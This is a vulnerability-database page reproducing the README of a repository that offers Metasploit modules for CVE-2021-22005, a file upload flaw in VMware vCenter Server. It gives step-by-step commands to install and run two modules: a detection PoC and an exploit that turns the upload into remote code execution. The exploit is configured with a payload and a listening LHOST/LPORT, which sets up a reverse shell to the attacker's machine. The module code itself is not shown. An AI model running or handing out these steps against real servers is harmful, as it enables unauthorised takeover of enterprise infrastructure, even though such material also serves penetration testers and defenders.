CVE-2021-22005 PoC — Vmware VMware vCenter Server 路径遍历漏洞

Source

Associated Vulnerability

Readme

# CVE-2021-22005-metasploit
the metasploit script(POC/EXP) about CVE-2021-22005 VMware vCenter Server contains an arbitrary file upload vulnerability

# preparation POC
```cmd
git clone https://github.com/TaroballzChen/CVE-2021-22005-metasploit
cd CVE-2021-22005-metasploit
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp vmware_vcenter_server_file_upload_poc.py ~/.msf4/modules/auxiliary/scanner/http/
chmod +x ~/.msf4/modules/auxiliary/scanner/http/vmware_vcenter_server_file_upload_poc.py
msfconsole
```

# POC usage
```text
set rhost <vuln ip/host>
set port <vuln port>
set ssl <default: true for https>
exploit
```

# result
the script will upload a harmless jsp which include "Could be vuln by CVE-2021-22005" text encoded by base64
![poc](poc.png)


# preparation EXP
```cmd
git clone https://github.com/TaroballzChen/CVE-2021-22005-metasploit
cd CVE-2021-22005-metasploit
mkdir -p ~/.msf4/modules/exploits/linux/http
cp vmware_vcenter_server_file_upload_to_rce.py ~/.msf4/modules/exploits/linux/http/
chmod +x ~/.msf4/modules/exploits/linux/http/vmware_vcenter_server_file_upload_to_rce.py
msfconsole
```

# exploit usage
```text
set target <target>
set PAYLOAD <payload>
set rhost <vuln ip>
set port <vuln port>
set LHOST <list host ip>
set LPORT <list port>
exploit
```

# exploit

![exploit](exp.png)


# reference
- <https://github.com/5gstudent/CVE-2021-22005->
- <https://github.com/rwincey/CVE-2021-22005>

File Snapshot

 [4.0K]  /data/pocs/59c5914bfed0b7c4a99442632e537de29a2c51d2
├── [3.5M]  exp.png
├── [4.2M]  poc.png
├── [1.4K]  README.md
├── [7.1K]  vmware_vcenter_server_file_upload_poc.py
└── [8.5K]  vmware_vcenter_server_file_upload_to_rce.py

0 directories, 5 files

Remarks